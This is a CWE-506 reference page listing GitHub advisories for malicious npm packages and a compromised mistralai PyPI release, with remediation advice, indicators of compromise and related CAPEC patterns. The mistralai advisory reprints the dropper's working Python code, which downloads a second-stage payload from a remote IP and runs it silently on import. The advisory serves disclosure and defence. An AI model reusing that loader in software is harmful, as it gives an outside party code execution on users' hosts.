Common Weakness Enumeration

CWE-506

Allowed-with-Review

Embedded Malicious Code

Abstraction: Class · Status: Incomplete

The product contains code that appears to be malicious in nature.

524 vulnerabilities reference this CWE, most recent first.

GHSA-WV39-CGMM-CQ29

Vulnerability from github – Published: 2020-09-03 22:23 – Updated: 2021-09-29 21:27
VLAI
Summary
Malicious Package in buffmr-xor
Details

Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.

Recommendation

Remove the package from your environment. Ensure no Ethereum funds were compromised.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "buffmr-xor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:52:51Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.",
  "id": "GHSA-wv39-cgmm-cq29",
  "modified": "2021-09-29T21:27:19Z",
  "published": "2020-09-03T22:23:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1261"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Malicious Package in buffmr-xor"
}

GHSA-WWF2-5CJ8-JX6W

Vulnerability from github – Published: 2018-07-23 20:50 – Updated: 2023-09-13 22:59
VLAI
Summary
nodesqlite is malware
Details

The nodesqlite package is a piece of malware that steals environment variables and sends them to attacker controlled locations.

All versions have been unpublished from the npm registry.

Recommendation

As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.

If you have found this installed in your environment, you should: 1. Delete the package 2. Clear your npm cache 3. Ensure it is not present in any other package.json files on your system 4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.

Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "nodesqlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-16049"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T22:01:22Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "The `nodesqlite` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. \n\nAll versions have been unpublished from the npm registry.\n\n\n## Recommendation\n\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. \n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. \n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.",
  "id": "GHSA-wwf2-5cj8-jx6w",
  "modified": "2023-09-13T22:59:29Z",
  "published": "2018-07-23T20:50:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16049"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-wwf2-5cj8-jx6w"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/492"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "nodesqlite is malware"
}

GHSA-WWWG-6R7F-9C9H

Vulnerability from github – Published: 2020-09-03 19:43 – Updated: 2021-09-30 20:15
VLAI
Summary
Malicious Package in file-logging
Details

This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.

Recommendation

Remove the package from your environment. There are no indications of further compromise.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "file-logging"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:48:10Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.",
  "id": "GHSA-wwwg-6r7f-9c9h",
  "modified": "2021-09-30T20:15:33Z",
  "published": "2020-09-03T19:43:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1126"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Malicious Package in file-logging"
}

GHSA-WX9M-WX4F-4CMG

Vulnerability from github – Published: 2026-05-18 17:55 – Updated: 2026-05-18 17:55
VLAI
Summary
Malicious dropper in mistralai 2.4.6 PyPI package
Details

The mistralai PyPI package version 2.4.6 contains a malicious dropper that executes on import on Linux. No v2.4.6 tag, commit, or release workflow run exists in this repository, the legitimate latest version before the upload was 2.4.5, and the upload bypassed this repository's normal release pipeline (which uses PyPI Trusted Publishing).

The mistralai PyPI project is currently quarantined.

Affected

  • mistralai==2.4.6 on PyPI.

Versions 2.4.5 and earlier are not known to be affected.

What the malicious code does

A function named _run_background_task was added to src/mistralai/client/__init__.py and called at module-load time. Reproduced from the public report in #523:

import subprocess as _sub
import os as _os

def _run_background_task():
    if not _sys.platform.startswith("linux") or _os.environ.get("MISTRAL_INIT"):
        return
    _os.environ["MISTRAL_INIT"] = "1"
    _url = "https://83.142.209.194/transformers.pyz"
    _dest = "/tmp/transformers.pyz"
    try:
        if not _os.path.exists(_dest):
            _sub.run(["curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15)
        if _os.path.exists(_dest):
            _sub.Popen(
                [_sys.executable, _dest],
                stdout=_sub.DEVNULL, stderr=_sub.DEVNULL,
                start_new_session=True, env=_os.environ.copy()
            )
    except:
        pass

_run_background_task()

On Linux only, the function:

  1. Returns early if MISTRAL_INIT is already set in the environment.
  2. Sets MISTRAL_INIT=1 so the spawned child does not re-trigger the dropper if it imports mistralai.
  3. Downloads https://83.142.209.194/transformers.pyz to /tmp/transformers.pyz with curl -k -L -s (TLS verification disabled, 15 s timeout). Skips the download if the file is already present.
  4. Spawns transformers.pyz with the current Python interpreter (sys.executable) as a detached process via Popen(..., start_new_session=True), with stdout and stderr discarded and any exception silently swallowed.

On non-Linux platforms the function returns immediately and does nothing.

The trigger is import mistralai, not package installation. pip install of a wheel does not execute package code; for an sdist it runs PEP 517 build hooks but those are in setup.py / pyproject.toml, not in __init__.py — so pip install, pip download, and pip wheel do not invoke this dropper.

The contents of transformers.pyz are not in the package and were not analyzed in this advisory. The behavior of the second-stage payload on the host is therefore unknown.

Recommendation

Any Linux environment that imported mistralai==2.4.6 should be treated as potentially compromised pending forensic review. Rotate every credential reachable from the importing process and review host and cloud audit logs for activity from approximately 2026-05-12 00:05 UTC onward (per the timing reported in #523).

Check whether you are affected

Installed version:

pip show mistralai | grep -i ^version

Dependency files and lockfiles:

grep -n -E 'mistralai\b.*2\.4\.6' \
  requirements*.txt pyproject.toml uv.lock poetry.lock Pipfile Pipfile.lock 2>/dev/null

Dropped file on disk:

ls -la /tmp/transformers.pyz

The presence of /tmp/transformers.pyz on a host that imported mistralai==2.4.6 indicates the download step ran successfully. Combined with absence of MISTRAL_INIT in the host's process environment history, it does not by itself confirm the second-stage executed; conversely its absence does not rule out execution if the file was cleaned up.

Remediation

  1. Pin mistralai to 2.4.5 or earlier. While the PyPI project is quarantined, install from this repository at a known-good tag, e.g. git+https://github.com/mistralai/client-python.git@v2.4.5.
  2. On affected Linux hosts, rotate every credential reachable from the importing process and review host and cloud audit logs.

Indicators of compromise

All IOCs below come from the public report in #523.

  • File: /tmp/transformers.pyz
  • Process: a Python interpreter (sys.executable) running /tmp/transformers.pyz detached from the parent's process group, with stdout/stderr to /dev/null
  • Environment variable: MISTRAL_INIT=1
  • Outbound HTTPS to 83[.]142[.]209[.]194 from curl (no TLS verification)
  • Function added to the package: _run_background_task in src/mistralai/client/__init__.py
  • SHA-256 of the malicious sdist (as reported in #523): 6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b

References

  • Public report with the dropper code: https://github.com/mistralai/client-python/issues/523
  • Quarantined PyPI project: https://pypi.org/project/mistralai/
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mistralai"
      },
      "versions": [
        "2.4.6"
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-18T17:55:27Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "The `mistralai` PyPI package version `2.4.6` contains a malicious dropper that executes on import on Linux. No `v2.4.6` tag, commit, or release workflow run exists in this repository, the legitimate latest version before the upload was `2.4.5`, and the upload bypassed this repository\u0027s normal release pipeline (which uses PyPI Trusted Publishing).\n\nThe `mistralai` PyPI project is currently quarantined.\n\n## Affected\n\n- `mistralai==2.4.6` on PyPI.\n\nVersions `2.4.5` and earlier are not known to be affected.\n\n## What the malicious code does\n\nA function named `_run_background_task` was added to `src/mistralai/client/__init__.py` and called at module-load time. Reproduced from the public report in [#523](https://github.com/mistralai/client-python/issues/523):\n\n```python\nimport subprocess as _sub\nimport os as _os\n\ndef _run_background_task():\n    if not _sys.platform.startswith(\"linux\") or _os.environ.get(\"MISTRAL_INIT\"):\n        return\n    _os.environ[\"MISTRAL_INIT\"] = \"1\"\n    _url = \"https://83.142.209.194/transformers.pyz\"\n    _dest = \"/tmp/transformers.pyz\"\n    try:\n        if not _os.path.exists(_dest):\n            _sub.run([\"curl\", \"-k\", \"-L\", \"-s\", _url, \"-o\", _dest], timeout=15)\n        if _os.path.exists(_dest):\n            _sub.Popen(\n                [_sys.executable, _dest],\n                stdout=_sub.DEVNULL, stderr=_sub.DEVNULL,\n                start_new_session=True, env=_os.environ.copy()\n            )\n    except:\n        pass\n\n_run_background_task()\n```\n\nOn Linux only, the function:\n\n1. Returns early if `MISTRAL_INIT` is already set in the environment.\n2. Sets `MISTRAL_INIT=1` so the spawned child does not re-trigger the dropper if it imports `mistralai`.\n3. Downloads `https://83.142.209.194/transformers.pyz` to `/tmp/transformers.pyz` with `curl -k -L -s` (TLS verification disabled, 15 s timeout). Skips the download if the file is already present.\n4. Spawns `transformers.pyz` with the current Python interpreter (`sys.executable`) as a detached process via `Popen(..., start_new_session=True)`, with stdout and stderr discarded and any exception silently swallowed.\n\nOn non-Linux platforms the function returns immediately and does nothing.\n\nThe trigger is `import mistralai`, not package installation. `pip install` of a wheel does not execute package code; for an sdist it runs PEP 517 build hooks but those are in `setup.py` / `pyproject.toml`, not in `__init__.py` \u2014 so `pip install`, `pip download`, and `pip wheel` do not invoke this dropper.\n\nThe contents of `transformers.pyz` are not in the package and were not analyzed in this advisory. The behavior of the second-stage payload on the host is therefore unknown.\n\n## Recommendation\n\nAny Linux environment that imported `mistralai==2.4.6` should be treated as potentially compromised pending forensic review. Rotate every credential reachable from the importing process and review host and cloud audit logs for activity from approximately 2026-05-12 00:05 UTC onward (per the timing reported in #523).\n\n## Check whether you are affected\n\nInstalled version:\n\n```bash\npip show mistralai | grep -i ^version\n```\n\nDependency files and lockfiles:\n\n```bash\ngrep -n -E \u0027mistralai\\b.*2\\.4\\.6\u0027 \\\n  requirements*.txt pyproject.toml uv.lock poetry.lock Pipfile Pipfile.lock 2\u003e/dev/null\n```\n\nDropped file on disk:\n\n```bash\nls -la /tmp/transformers.pyz\n```\n\nThe presence of `/tmp/transformers.pyz` on a host that imported `mistralai==2.4.6` indicates the download step ran successfully. Combined with absence of `MISTRAL_INIT` in the host\u0027s process environment history, it does not by itself confirm the second-stage executed; conversely its absence does not rule out execution if the file was cleaned up.\n\n## Remediation\n\n1. Pin `mistralai` to `2.4.5` or earlier. While the PyPI project is quarantined, install from this repository at a known-good tag, e.g. `git+https://github.com/mistralai/client-python.git@v2.4.5`.\n2. On affected Linux hosts, rotate every credential reachable from the importing process and review host and cloud audit logs.\n\n## Indicators of compromise\n\nAll IOCs below come from the public report in [#523](https://github.com/mistralai/client-python/issues/523).\n\n- File: `/tmp/transformers.pyz`\n- Process: a Python interpreter (`sys.executable`) running `/tmp/transformers.pyz` detached from the parent\u0027s process group, with stdout/stderr to `/dev/null`\n- Environment variable: `MISTRAL_INIT=1`\n- Outbound HTTPS to `83[.]142[.]209[.]194` from `curl` (no TLS verification)\n- Function added to the package: `_run_background_task` in `src/mistralai/client/__init__.py`\n- SHA-256 of the malicious sdist (as reported in #523): `6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b`\n\n## References\n\n- Public report with the dropper code: https://github.com/mistralai/client-python/issues/523\n- Quarantined PyPI project: https://pypi.org/project/mistralai/",
  "id": "GHSA-wx9m-wx4f-4cmg",
  "modified": "2026-05-18T17:55:27Z",
  "published": "2026-05-18T17:55:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mistralai/client-python/security/advisories/GHSA-wx9m-wx4f-4cmg"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mistralai/client-python/issues/523"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mistralai/client-python"
    },
    {
      "type": "WEB",
      "url": "https://safedep.io/mass-npm-supply-chain-attack-tanstack-mistral"
    },
    {
      "type": "WEB",
      "url": "https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack"
    },
    {
      "type": "WEB",
      "url": "https://www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Malicious dropper in mistralai 2.4.6 PyPI package"
}

GHSA-WXRM-2H86-V95F

Vulnerability from github – Published: 2020-09-03 21:04 – Updated: 2021-09-29 20:45
VLAI
Summary
Malicious Package in pizza-pasta
Details

Version 1.0.3 of pizza-pasta contains malicious code as a install scripts. The package created folders in the system's Desktop and downloaded an image from imgur.com. The package also printed the users SSH keys to the console.

Recommendation

Remove the package from your environment. There are no evidences of further compromise.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "pizza-pasta"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:50:44Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Version 1.0.3 of `pizza-pasta` contains malicious code as a install scripts. The package created folders in the system\u0027s Desktop and downloaded an image from `imgur.com`. The package also printed the users SSH keys to the console.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no evidences of further compromise.",
  "id": "GHSA-wxrm-2h86-v95f",
  "modified": "2021-09-29T20:45:26Z",
  "published": "2020-09-03T21:04:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1196"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Malicious Package in pizza-pasta"
}

GHSA-X3M6-RPRW-862W

Vulnerability from github – Published: 2020-09-03 17:43 – Updated: 2021-09-30 19:50
VLAI
Summary
Malicious Package in node-buc
Details

All versions of node-buc contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.

Recommendation

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.

The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "node-buc"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:45:47Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "All versions of `node-buc` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",
  "id": "GHSA-x3m6-rprw-862w",
  "modified": "2021-09-30T19:50:50Z",
  "published": "2020-09-03T17:43:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1059"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Malicious Package in node-buc"
}

GHSA-X3W4-MRMV-CW2X

Vulnerability from github – Published: 2020-09-03 22:19 – Updated: 2021-09-29 21:26
VLAI
Summary
Malicious Package in buffev-xor
Details

Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.

Recommendation

Remove the package from your environment. Ensure no Ethereum funds were compromised.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "buffev-xor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:52:44Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.",
  "id": "GHSA-x3w4-mrmv-cw2x",
  "modified": "2021-09-29T21:26:19Z",
  "published": "2020-09-03T22:19:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1258"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Malicious Package in buffev-xor"
}

GHSA-X45V-PVPG-HCRH

Vulnerability from github – Published: 2020-09-03 19:54 – Updated: 2021-09-30 20:27
VLAI
Summary
Malicious Package in mysql-koa
Details

This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.

Recommendation

Remove the package from your environment. There are no indications of further compromise.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "mysql-koa"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:48:34Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.",
  "id": "GHSA-x45v-pvpg-hcrh",
  "modified": "2021-09-30T20:27:05Z",
  "published": "2020-09-03T19:54:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1136"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Malicious Package in mysql-koa"
}

GHSA-X48M-GP6R-GP4V

Vulnerability from github – Published: 2020-09-03 18:21 – Updated: 2021-09-30 20:04
VLAI
Summary
Malicious Package in rate-map
Details

Version 1.0.3 of rate-map contains malicious code. The malware breaks functionality of the purescript-installer package by rewriting code of the dl-tar dependency.

Recommendation

Upgrade to version 1.0.5 or later. There is no indication of further compromise.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "rate-map"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.3"
            },
            {
              "fixed": "1.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.0.3"
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:46:42Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Version 1.0.3 of `rate-map`  contains malicious code. The malware breaks functionality of the `purescript-installer` package by rewriting code of the `dl-tar` dependency.\n\n\n## Recommendation\n\nUpgrade to version 1.0.5 or later. There is no indication of further compromise.",
  "id": "GHSA-x48m-gp6r-gp4v",
  "modified": "2021-09-30T20:04:54Z",
  "published": "2020-09-03T18:21:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1083"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Malicious Package in rate-map"
}

GHSA-X52F-H74P-9JH8

Vulnerability from github – Published: 2018-07-23 21:00 – Updated: 2023-09-11 22:59
VLAI
Summary
node-sqlite is malware
Details

The node-sqlite package is a piece of malware that steals environment variables and sends them to attacker controlled locations.

All versions have been unpublished from the npm registry.

Recommendation

As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.

If you have found this installed in your environment, you should: 1. Delete the package 2. Clear your npm cache 3. Ensure it is not present in any other package.json files on your system 4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.

Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "node-sqlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-16048"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-506"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T22:02:07Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "The `node-sqlite` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. \n\nAll versions have been unpublished from the npm registry.\n\n\n## Recommendation\n\n\n\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. \n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. \n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.",
  "id": "GHSA-x52f-h74p-9jh8",
  "modified": "2023-09-11T22:59:55Z",
  "published": "2018-07-23T21:00:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16048"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-x52f-h74p-9jh8"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/493"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "node-sqlite is malware"
}

Mitigation
Implementation Operation

Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.

CAPEC-442: Infected Software

An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.

CAPEC-448: Embed Virus into DLL

An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.

CAPEC-636: Hiding Malicious Data or Code within Files

Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.